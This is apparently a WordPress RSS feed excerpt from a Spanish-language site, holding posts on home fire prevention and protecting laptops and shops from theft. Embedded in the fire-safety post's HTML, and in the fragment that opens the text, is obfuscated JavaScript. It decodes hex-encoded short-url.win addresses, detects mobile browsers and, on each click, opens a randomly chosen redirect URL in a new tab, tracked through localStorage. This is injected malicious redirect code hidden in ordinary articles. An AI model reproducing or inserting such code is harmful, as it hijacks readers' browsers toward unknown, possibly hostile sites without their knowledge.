|maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/grandoreiro-el-malware-bancario-que-azota-a-brasil-y-mas/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">98630</post-id>	</item>
		<item>
		<title>Seguridad en el hogar: Cómo proteger tu familia de incendios</title>
		<link>https://www.todoenunclick.com/seguridad-en-el-hogar-como-proteger-tu-familia-de-incendios/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Mon, 18 Mar 2024 14:18:02 +0000</pubDate>
				<category><![CDATA[Hogar]]></category>
		<category><![CDATA[consejos]]></category>
		<category><![CDATA[incendios]]></category>
		<category><![CDATA[prevención]]></category>
		<category><![CDATA[seguridad]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=98614</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2024/03/Detector-de-humo-Verisure.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Seguridad en el hogar: Cómo proteger tu familia de incendios" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/Detector-de-humo-Verisure.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/Detector-de-humo-Verisure.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/Detector-de-humo-Verisure.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/Detector-de-humo-Verisure.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/Detector-de-humo-Verisure.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/Detector-de-humo-Verisure.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/Detector-de-humo-Verisure.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>De acuerdo con datos del Ministerio de Seguridad de la Nación, los incendios son una de las principales causas de accidentes domésticos en Argentina y, según la Organización Mundial de la Salud (OMS), se ubican entre los principales motivos de muerte accidental en todo el mundo.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En este sentido, ¿qué ambientes del hogar están más expuestos a sufrir focos de incendio y qué se puede tener en cuenta para prevenir? Profesionales en el cuidado de las personas acercan consejos de seguridad:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul><!-- wp:list-item -->
<li><strong>La cocina</strong>: Es uno de los lugares más propensos debido a la presencia de elementos inflamables como aceite, gas y electricidad. Para prevenir, es importante no dejar <strong>nunca</strong> las hornallas desatendidas mientras se cocina y siempre mantener los utensilios y paños alejados del fuego. Es clave, también, limpiar regularmente la grasa del horno y la acumulada en la campana extractora, ya que se trata de un elemento altamente inflamable.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Electricidad:</strong>&nbsp;Los cortocircuitos y los cables dañados son otras de las principales causas de incendios en el hogar. Se recomienda, entonces, revisar regularmente los cables y enchufes en busca de signos de daño. No sobrecargar los enchufes y las zapatillas y/o prolongadores. En caso de detectar una toma de corriente dañada o notar chispas al enchufar un electrodoméstico, es importante no hacer uso de este bajo ningún concepto y llamar a un profesional para evaluar la situación.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Calefacción: </strong>Las fuentes de calor como las estufas, chimeneas y calentadores portátiles pueden ser peligrosas si no se utilizan correctamente. Para prevenir incendios relacionados con la calefacción, se sugiere mantener los objetos inflamables alejados de las fuentes de calor, supervisar constantemente las estufas y chimeneas mientras están en uso y asegurarse de que los equipos estén colocados en una superficie plana y estable. Además, se agrega a estas recomendaciones el evitar poner ropa u otros elementos sobre las estufas o calentadores.&nbsp;</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Fumar:</strong>&nbsp;Los descuidos al fumar son una causa muy común de fuego en el hogar. Es importante asegurarse de que las colillas estén completamente apagadas antes de desecharlas, además de evitar fumar en la cama o en lugares donde haya materiales inflamables cerca.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>De acuerdo con datos provistos por la empresa de seguridad Verisure en base a su porfolio de clientes en Argentina, se detecta que año tras año existe un crecimiento sobre la elección en los hogares de sumar dispositivos de prevención contra incendios. Y, entre estos, los detectores de humo para interiores son los equipamientos más populares. Según la Asociación Nacional de Protección contra Incendios (NFPA) este tipo de equipos instalados reduce el riesgo de muerte en un 50% frente a un incendio.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Cómo funcionan los detectores de humo</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los expertos consultados explican que estos dispositivos, en cuanto detectan humo o una variación de temperatura en el ambiente, emiten una alerta sonora y visual para que las personas que se encuentren en el hogar sean advertidas. A la vez, envían una señal a la central de monitoreo a la que están conectados, la que activa los protocolos correspondientes de inmediato contactándose con las autoridades respectivas para dar auxilio.</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/seguridad-en-el-hogar-como-proteger-tu-familia-de-incendios/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">98614</post-id>	</item>
		<item>
		<title>Cómo proteger tu laptop contra robos y daños</title>
		<link>https://www.todoenunclick.com/como-proteger-tu-laptop-contra-robos-y-danos-2/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Tue, 31 Oct 2023 19:53:52 +0000</pubDate>
				<category><![CDATA[Empresas y Negocios]]></category>
		<category><![CDATA[candado para laptop]]></category>
		<category><![CDATA[cuidados]]></category>
		<category><![CDATA[daños]]></category>
		<category><![CDATA[funda]]></category>
		<category><![CDATA[laptop]]></category>
		<category><![CDATA[limpieza]]></category>
		<category><![CDATA[precauciones]]></category>
		<category><![CDATA[prevención]]></category>
		<category><![CDATA[protección]]></category>
		<category><![CDATA[rastreo]]></category>
		<category><![CDATA[robos]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[Seguro]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=95851</guid>

					<description><![CDATA[<p><img width="951" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2023/10/Verisure-Robos-en-comericos.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Cómo proteger tu laptop contra robos y daños" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/10/Verisure-Robos-en-comericos.jpg?w=951&amp;ssl=1 951w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/10/Verisure-Robos-en-comericos.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/10/Verisure-Robos-en-comericos.jpg?resize=504%2C336&amp;ssl=1 504w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/10/Verisure-Robos-en-comericos.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/10/Verisure-Robos-en-comericos.jpg?resize=630%2C420&amp;ssl=1 630w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/10/Verisure-Robos-en-comericos.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/10/Verisure-Robos-en-comericos.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 951px) 100vw, 951px" /></p><!-- wp:paragraph -->
<p>En el actual contexto donde la inseguridad se posiciona entre los ejes de discusión y de preocupación de los argentinos, un informe presentado recientemente por la empresa de seguridad Verisure mostró que, en el trimestre comprendido entre mayo a julio 2023, los comercios registraron el 72% de los delitos respecto a los hogares, elevándose 2.7 veces más uno sobre otro, respectivamente.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En este sentido, de acuerdo a nuevos datos provistos por la empresa de seguridad, <strong>en septiembre, el tipo de hecho que prevaleció en locales comerciales fue el robo,</strong> <strong>con el 40% de las alertas registradas</strong>. Por su lado, los intentos de intrusión -esto quiere decir robos frustrados- alcanzaron el 14% y, los altercados, el 17%. Este análisis surge de información relevada por su Central Receptora de Alarmas, que recaba datos del universo de su cartera en todo el país.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Respecto a los horarios que presentaron mayor frecuencia de situaciones de riesgo en comercios, llama la atención que, a lo largo del pasado mes, <strong>el 68% de los incidentes ocurrieron en pleno horario comercial</strong>, ocupando el primer puesto la <strong>franja de la tarde, con el 37% de los hechos</strong> y comprendieron desde robos, intentos de robo, altercados y emergencias. Pero, haciendo un doble click en los delitos de robo, el momento del día con mayores registros estuvo representado por la noche, con una gran inclinación hacia las horas de la madrugada.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>El método del delito</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Continuando con el tipo de hecho <strong>“robos” e “intentos de robos”, en septiembre, solo entre la provincia de Buenos Aires y CABA acapararon el 87% de los incidentes, siguiendo en la lista Córdoba, Mendoza y Rosario</strong>. Frente al análisis de los expertos en seguridad sobre el método más frecuente para burlar las instalaciones, el evento que más registros alertó fue el <strong>intento de forzar puertas y ventanas.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Ante este escenario, los especialistas recomiendan <strong>evaluar medidas y sistemas de protección a partir de las necesidades y características de cada negocio</strong>. “<em>De acuerdo al tipo de locación y su actividad, los profesionales en seguridad están preparados para realizar una evaluación concreta y ofrecer el sistema que mejor cuadre con cada comercio"</em>, comenta Carlos Beltran Rubinos, director de operaciones de Verisure Argentina. Y suma, “<em>los sistemas de alarmas están integrados a distintos dispositivos interconectados que activan y envían alertas a la central receptora del servicio que se haya elegido”. </em>Entre estos dispositivos para locales comerciales que comenta el especialista se destacan: paneles de control, sirenas, cámaras, sensores de movimiento y de apertura para puertas y ventanas. También, existen dispositivos disuasorios como las placas externas o sistemas que actúan proactivamente frente a un intento de intrusión. <em>“En Verisure, por ejemplo, contamos con ZeroVision, una bomba de humo que se activa de forma remota y que es capaz de inhabilitar en tiempo real a los delincuentes frente al intento de robo, ya que nubla a 0 la visibilidad en el espacio que está siendo ultrajado</em>”<em>, </em>destaca Beltran Rubinos. Y para concluir agrega: “<em>se debe considerar que no es lo mismo tener una cámara instalada en tu negocio y que la puedas monitorear remotamente, a contar con un equipo completo a disposición detrás de esa cámara las 24 horas del día, los 365 días del año, capaz de actuar profesionalmente ante cada situación y acompañar en todo momento, por más crítico que sea”.</em></p>
<!-- /wp:paragraph -->
